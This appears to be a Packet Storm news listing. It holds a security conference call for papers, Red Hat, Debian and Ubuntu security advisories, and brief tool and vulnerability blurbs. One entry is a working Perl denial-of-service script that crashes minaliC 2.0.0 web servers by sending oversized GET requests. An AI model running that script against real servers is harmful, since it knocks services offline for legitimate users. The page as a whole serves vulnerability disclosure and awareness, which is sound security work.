EuskalHack Security Congress seventh edition is a new proposal from the EuskalHack Computer Security Association, with the aim to promote the community growth and the culture in the digital security field. As usual, in this new edition proximity to our public and technical quality will be our hallmarks. With an estimated capacity of 200 people, EuskalHack Security Congress has established itself as the most relevant congress specialized in computer security in the Basque Country, and as a national reference. The profile of attendees include specialized companies, public organisms, professionals, hobbyists and students in the area of security and Information Technology. The congress will take place on the 21st and 22nd of June 2024 in the lovely city of Donostia San Sebastian (Gipuzkoa).

                                                                                                                                 @@@@@@                                                                                                             i@@@@@@@@@@@@t                                                                                                      ;@@@@@@@@88@@@@@@@@t                                                                                                 ,@@@@@:          .@@@@@1                                                                                              C@@@@                8@@@8                                                                                            L@@@L                  ;@@@8                                                                                           @@@0                    f@@@,                                                                                         1@@@.                     @@@C                                                                                         t@@@                      @@@0                                                                                     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@                                                                                @@           G@@@@@@@@@@@G          i@L            _____          _         _ _   _            _                       @@       1@@@t;8@C8GG088.f@@@i      ;@f           | ____|   _ ___| | ____ _| | | | | __ _  ___| | __                   @@     8@@t8@@@@@@i@L@0@@@@0;@@G    ;@f           |  _|| | | / __| |/ / _` | | |_| |/ _` |/ __| |/ /                   @@   f@@ .@@@@f@01C@L1@@C@@@@ .@@:  ;@f           | |__| |_| \__ \   < (_| | |  _  | (_| | (__|   <                    @@  8@G  @GL;8@@@@@@@@@@@L:C0@  G@C ;@f           |_____\__,_|___/_|\_\__,_|_|_|_|_|\__,_|\___|_|\_\                   @@ 8@L     @@@@@@@@@@@@@@@@f     C@t;@f           / ___|  ___  ___ _   _ _ __(_) |_ _   _                              @@@@      @@@@@@@@    @@@@@@@      @@@@           \___ \ / _ \/ __| | | | '__| | __| | | |                             @@@@     @@@@@@@       @@@@@@@     @@@@            ___) |  __/ (__| |_| | |  | | |_| |_| |                             @@@@     @@@@@@8        8@@@@@     @@@@           |____/ \___|\___|\__,_|_|  |_|\__|\__, |    ___    ___ _  _          @@@@     @@@@@@@8      @@@@@@@     @@@@            / ___|___  _ __   __ _ _ __ ___  |___/__   \  \  /  /| || |         @@@@     :@@@@@@@@   @@@@@@@@      @@@@           | |   / _ \| '_ \ / _` | '__/ _ \/ __/ __|   \  \/  / | || |         @@ @@     ;@@@@@@@   @@@@@@@      @@;@f           | |__| (_) | | | | (_| | | |  __/\__ \__ \    \    /  | || |         @@  @@      8@@@@@@@@@@@@@@      @@ ;@f            \____\___/|_| |_|\__, |_|  \___||___/___/     \__/   |_||_|         @@   @@,      .@@@@@@@@@       :@@  ;@f                             |___/                                              @@    0@@  .8@0C@8@@@8@0L@8,  @@C   ;@f                                                                                @@      0@@L  :@@@@@@@@@,  G@@G     ;@f                                                                                @@        .8@@@8C@C@18G@@@@8.       ;@f                                                                               @@@8GGGGGGGGGGGG8@@@@@@@8GGGGGGGGGGGG@@@                                                                               G@@1:::::::::::::::0@::::::::::::::::@@@                                                                        ] EuskalHack Security Congress VII Call For Papers [Introduction------------EuskalHack Security Congress seventh edition is a new proposal from the EuskalHack Computer Security Association, with the aim to promote the community growth and the culture in the digital security field. As usual, in this new edition proximity to our public and technical quality will be our hallmarks.With an estimated capacity of 200 people, EuskalHack Security Congress has established itself as the most relevant congress specialized in computer security in the Basque Country, and as a national reference. The profile of attendees include specialized companies, public organisms, professionals, hobbyists and students in the area of security and Information Technology.Date and location-----------------The congress will take place on the 21st and 22nd of June 2024 in the lovely city of Donostia – San Sebastian (Gipuzkoa).Take part as a speaker----------------------We are pleased to make a call to all those who wish to be part of this seventh edition of EuskalHack Security Congress in one of the various categories of talks and workshops that we propose.We are looking for small workshops or talks related to digital security, information security or tech in general, such as: - Robotics, Drones, Consoles, Hardware Hacking, Gadgets, mobile environments... - Security in critical infrastructures, industrial environments, Smart City, financial... - Security in Cloud, virtualization, containers, hardening, DevOps, cloud forensics... - GSM signal hacking, SDR, LTE, 4G/5G, Satellite links, VoIP... - Cryptography, steganography, forensic and evasion techniques... - AI, Neural networks, Data mining, statistical modeling... - Malware in general, APTs, Bypassing, Sandboxing... - Corporate security and intelligence, Social engineering, OPSEC, OSINT... - Web Hacking, SQL and NoSQL injection, LDAP injection, Hacking with search engines... - Hacktivism, net neutrality, Deep web, darknet, cryptocurrencies... - Reverse engineering.All proposals will be evaluated based on its originality, educational value, technical level, contribution to the community and the capacity to make our attendees have a good time.Likewise, priority will be given to those proposals that have not been previously exhibited in any other event. If this is not the case, please let us know when sending the proposal.Language and internationalization---------------------------------At EuskalHack we value linguistic diversity and internationalization. Therefore, we will accept presentations in Spanish, Basque and English.For this purpose, each speaker must indicate in which language/s he/she wishes to develop his/her presentation (both the oral part and the projected presentation).Note: Bilingual options will be positively valued, in order to reach the maximum number of attendees possible.Talks and Workshops-------------------We will have several spaces for the course of this event, which may include talks and workshops, admitting two types of approaches: * Standard talks: 45 minutes duration * Specific workshops: 120 minutes duration    Once all the proposals have been received, the total number of presentations of each type will be determined, considering aspects such as technological diversity and the audience.Workshops will be taught on June 22 with an approximate capacity of 40 attendees. In addition, we kindly request that the proposal submission includes information regarding the required infrastructure and materials for its delivery.Proposals---------Proposal submissions should be sent before April 21st through the forms found on the following links:ENGLISH    https://forms.gle/GPkrD6oV87eKfbvf6SPANISH    https://forms.gle/9b4fhsv8kCRxmFwu9  EUSKERA     https://forms.gle/RdwyQ65vCDqumsQh6Dates to consider-----------------The following are the dates and milestones which should be considered during various phases by the speakers directly involved:01/12/23    Opening of registration for speakers21/04/24    Deadline for speaker registration30/04/24    Deadline for confirmation of speakers by the Organization 12/05/24    Speaker requirements submission31/05/24    Follow-up communication20/06/24    Speakers reception21/06/24    EuskalHack Security CongressWe kindly request commitment from all stakeholders to adhere to the specified deadlines in order to ensure proper planning and effective execution of the conference.Speaker rights and privileges----------------------------- * Take part in the most important security congress in the Basque Country. * Travel to and from the conference at the organization's expense. In international cases, prior arrangements may be required.   * Accommodation in a hotel in the city close to the congress. * Complete access to the conference with a companion. * Dinners with the other speakers and conference organizers.Obligations of the speaker------------------------ * Use the templates, typography, design and official logo of the organization. * Provide the documentation associated with the presentation as well as its details. * Send the documents on the appropriate dates in order to facilitate their correct development. * Explicitly accept the publication of the materials presented, as well as any image and audio-visual recording in the media required.Notas importantes------------------- * Priority will be given to papers and workshops not published in other security congresses and other media. * Compliance with obligations and regulations by all concerned parties is vital to avoid any setbacks for the speaker and the congress. * The duration of the talks must stick to the terms of the agreement, allowing the audience to have time for the round of questions. * The talks and workshops must stick to the computer security ethical code, common sense and the applicable laws. * It is essential that you indicate the needs regarding travel and accommodation in order to manage your stay with us in the best possible way. The organization reserves the right not to take charge of this aspect if it is not expressly indicated.Sponsors--------------Being part of EuskalHack as a sponsoring company implies having presence and impact in a unique and singular environment, allowing to address a message to a target audience, and facilitating the consolidation of your brand and credibility in an event of relevance for the community. If you wish to take part in this congress, please contact us at the following address: info@euskalhack.orgContact-------Web:        https://securitycongress.euskalhack.org/Mail:       info@euskalhack.orgTwitter:    @EuskalHack

EuskalHack Security Congress VII Call For Papers

Red Hat Security Advisory 2024-0046-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0046.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid:4 security updateAdvisory ID:        RHSA-2024:0046-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0046Issue date:         2024-01-04Revision:           03CVE Names:          CVE-2023-46724====================================================================Summary: An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46724References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2247567https://bugzilla.redhat.com/show_bug.cgi?id=2248521https://bugzilla.redhat.com/show_bug.cgi?id=2252923https://bugzilla.redhat.com/show_bug.cgi?id=2252926

Red Hat Security Advisory 2024-0046-03

Red Hat Security Advisory 2024-0033-03 - An update for redhat-release-virtualization-host and redhat-virtualization-host is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0033.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Virtualization Host 4.4.z SP 1 security updateAdvisory ID:        RHSA-2024:0033-03Product:            Red Hat VirtualizationAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0033Issue date:         2024-01-03Revision:           03CVE Names:          CVE-2023-4911====================================================================Summary: An update for redhat-release-virtualization-host and redhat-virtualization-host is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.Security Fix(es):For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/2974891CVEs:CVE-2023-4911References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2238352

Red Hat Security Advisory 2024-0033-03

minaliC version 2.0.0 suffers from a denial of service vulnerability.

    #!/usr/bin/perluse Socket;# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 03 january 2024# Vendor Homepage: http://minalic.sourceforge.net/# Download to demo: https://drive.google.com/file/d/1WoDbps6up2s5Xa40YXDSABRU9J17yRQd/view?usp=sharing# Notification vendor: No reported# Tested Version: minaliC 2.0.0# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data via method GET to web server.#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";my $junk = "\x41" x 245;my $host = "\x41" x 135;my $i=0;while ($i <= 3) {my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";my $sock;socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";my $addr = sockaddr_in($port, inet_aton($ip));connect($sock, $addr);send($sock, $buf, length($buf), 0);$i++;}    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print "***************************************************\n";      print "*       minaliC 2.0.0 - Denied of Service         *\n";      print "*                                                 *\n";      print "*            Coded by Fernando Mengali            *\n";      print "*                                                 *\n";      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";      print "*                                                 *\n";      print "***************************************************\n";  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated

minaliC 2.0.0 Denial Of Service

Debian Linux Security Advisory 5594-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5594-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
January 02, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2021-44879 CVE-2023-5178 CVE-2023-5197 CVE-2023-5717  
                 CVE-2023-6121 CVE-2023-6531 CVE-2023-6817 CVE-2023-6931  
                 CVE-2023-6932 CVE-2023-25775 CVE-2023-34324 CVE-2023-35827  
                 CVE-2023-45863 CVE-2023-46813 CVE-2023-46862 CVE-2023-51780  
                 CVE-2023-51781 CVE-2023-51782

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2021-44879

    Wenqing Liu reported a NULL pointer dereference in the f2fs  
    implementation. An attacker able to mount a specially crafted image  
    can take advantage of this flaw for denial of service.

CVE-2023-5178

    Alon Zahavi reported a use-after-free flaw in the NVMe-oF/TCP  
    subsystem in the queue initialization setup, which may result in  
    denial of service or privilege escalation.

CVE-2023-5197

    Kevin Rich discovered a use-after-free flaw in the netfilter  
    subsystem which may result in denial of service or privilege  
    escalation for a user with the CAP_NET_ADMIN capability in any user  
    or network namespace.

CVE-2023-5717

    Budimir Markovic reported a heap out-of-bounds write vulnerability  
    in the Linux kernel's Performance Events system caused by improper  
    handling of event groups, which may result in denial of service or  
    privilege escalation. The default settings in Debian prevent  
    exploitation unless more permissive settings have been applied in  
    the kernel.perf_event_paranoid sysctl.

CVE-2023-6121

    Alon Zahavi reported an out-of-bounds read vulnerability in the  
    NVMe-oF/TCP which may result in an information leak.

CVE-2023-6531

    Jann Horn discovered a use-after-free flaw due to a race condition  
    when the unix garbage collector's deletion of a SKB races  
    with unix_stream_read_generic() on the socket that the SKB is  
    queued on.

CVE-2023-6817

    Xingyuan Mo discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6931

    Budimir Markovic reported a heap out-of-bounds write vulnerability  
    in the Linux kernel's Performance Events system which may result in  
    denial of service or privilege escalation. The default settings in  
    Debian prevent exploitation unless more permissive settings have  
    been applied in the kernel.perf_event_paranoid sysctl.

CVE-2023-6932

    A use-after-free vulnerability in the IPv4 IGMP implementation may  
    result in denial of service or privilege escalation.

CVE-2023-25775

    Ivan D Barrera, Christopher Bednarz, Mustafa Ismail and Shiraz  
    Saleem discovered that improper access control in the Intel Ethernet  
    Controller RDMA driver may result in privilege escalation.

CVE-2023-34324

    Marek Marczykowski-Gorecki reported a possible deadlock in the Xen  
    guests event channel code which may allow a malicious guest  
    administrator to cause a denial of service.

CVE-2023-35827

    Zheng Wang reported a use-after-free flaw in the Renesas Ethernet  
    AVB support driver.

CVE-2023-45863

    A race condition in library routines for handling generic kernel  
    objects may result in an out-of-bounds write in the  
    fill_kobj_path() function.

CVE-2023-46813

    Tom Dohrmann reported that a race condition in the Secure Encrypted  
    Virtualization (SEV) implementation when accessing MMIO registers  
    may allow a local attacker in a SEV guest VM to cause a denial of  
    service or potentially execute arbitrary code.

CVE-2023-46862

    It was discovered that a race condition in the io_uring  
    subsystem may result in a NULL pointer dereference, causing a  
    denial of service.

CVE-2023-51780

    It was discovered that a race condition in the ATM (Asynchronous  
    Transfer Mode) subsystem may lead to a use-after-free.

CVE-2023-51781

    It was discovered that a race condition in the Appletalk subsystem  
    may lead to a use-after-free.

CVE-2023-51782

    It was discovered that a race condition in the Amateur Radio X.25  
    PLP (Rose) support may lead to a use-after-free. This module is not  
    auto-loaded on Debian systems, so this issue only affects systems  
    where it is explicitly loaded.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.205-2.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWUa1NfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qg9A/9Gmn8iGa9gAAER4sxUYkSt+HacnN8q6Fm6SPiFu3jtfbtdMnZgbgnyoJl  
vMsJk+rGxGdgUoVRRXFkVT2erleMA9DeuCcdwM0FEM1bnPdzR8ACQhuqGX9PPzO3  
GpRMwELC8gkL7fkkLjEos3SJYJ8AhJpo4xDz9arCnZ9pvDRTU5WniEiy3tsCKTk1  
IXTJyTuhgcuxXdUAA0kppqb0lUVfE5mEQpfw1fcvgKhVJoDHs/etupOTFZxTSwKp  
H2SPdJ+cw4MeSb4Y5rtchPWYwm7y9HLxZx5lDBJXBGXX+bZeNPInL4euXZbJzWf1  
tQqmhI07B46/Zd0QOwSKlZIysbD4VK/OarUQ0jtllHzb6HegIXh/9DMPgxbZjsg/  
Du39pj7FL6lii47VJkwE91AgDMFiwLiDrZodGTmX6vrV27kvnABklTTxZxkScpoA  
Q8LysgOwHQNeE8xrEKaqGH+T5zpgALrFZ3bwaZ7J+BT1fBVmukckbygdeQKZjPbn  
NOj1M12+sPGmukpcPAazoQMLC/Suv3GI5TYykoiNd0NGDYfgJUL5GQMec2L7GH/y  
Cb1/DBZzAR6ne91STf66TcLTQR+DKaOVgR/Yjd2Ch74Pv5kZJ03c6shbwfXhidO/  
fOWQNzXICmheuL++eL3Cf0nCpDZlbvcQN/O7OvvERnvZBzLWJdw=3Gqv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5594-1

Any unprivileged, local user in Microsoft Windows can disclose whether a specific file, directory or registry key exists in the system or not, even if they do not have the open right to it or enumerate right to its parent.

Microsoft Windows Kernel Information Disclosure

Chrome suffers from a type confusion vulnerability in BindTextSuggestionHostForFrame.

Chrome BindTextSuggestionHostForFrame Type Confusion

This is a custom firmware written for the Proxmark3 device. It extends the currently available firmware. This release is nicknamed Steamboat Willie.

Proxmark3 4.17768 Custom Firmware

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 5.0.1

Ubuntu Security Notice 6564-1 - Hubert Kario discovered that Node.js incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to obtain sensitive information. CarpetFuzz, Dawei Wang discovered that Node.js incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6564-1January 03, 2024nodejs vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in Node.js.Software Description:- nodejs: An open-source, cross-platform JavaScript runtime environment.Details:Hubert Kario discovered that Node.js incorrectly handled certain inputs. If auser or an automated system were tricked into opening a specially crafted inputfile, a remote attacker could possibly use this issue to obtain sensitiveinformation. (CVE-2022-4304)CarpetFuzz, Dawei Wang discovered that Node.js incorrectly handled certaininputs. If a user or an automated system were tricked into opening a speciallycrafted input file, a remote attacker could possibly use this issue to cause adenial of service. (CVE-2022-4450)Octavio Galland and Marcel Böhme discovered that Node.js incorrectly handledcertain inputs. If a user or an automated system were tricked into opening aspecially crafted input file, a remote attacker could possibly use this issueto cause a denial of service. (CVE-2023-0215)David Benjamin discovered that Node.js incorrectly handled certain inputs. If auser or an automated system were tricked into opening a specially crafted inputfile, a remote attacker could possibly use this issue to obtain sensitiveinformation. (CVE-2023-0286)Hubert Kario and Dmitry Belyavsky discovered that Node.js incorrectly handledcertain inputs. If a user or an automated system were tricked into opening aspecially crafted input file, a remote attacker could possibly use this issueto cause a denial of service. (CVE-2023-0401)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   libnode-dev                     12.22.9~dfsg-1ubuntu3.3   libnode72                       12.22.9~dfsg-1ubuntu3.3   nodejs                          12.22.9~dfsg-1ubuntu3.3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6564-1   CVE-2022-4304, CVE-2022-4450, CVE-2023-0215, CVE-2023-0286,   CVE-2023-0401Package Information:   https://launchpad.net/ubuntu/+source/nodejs/12.22.9~dfsg-1ubuntu3.3

Source

Packet Storm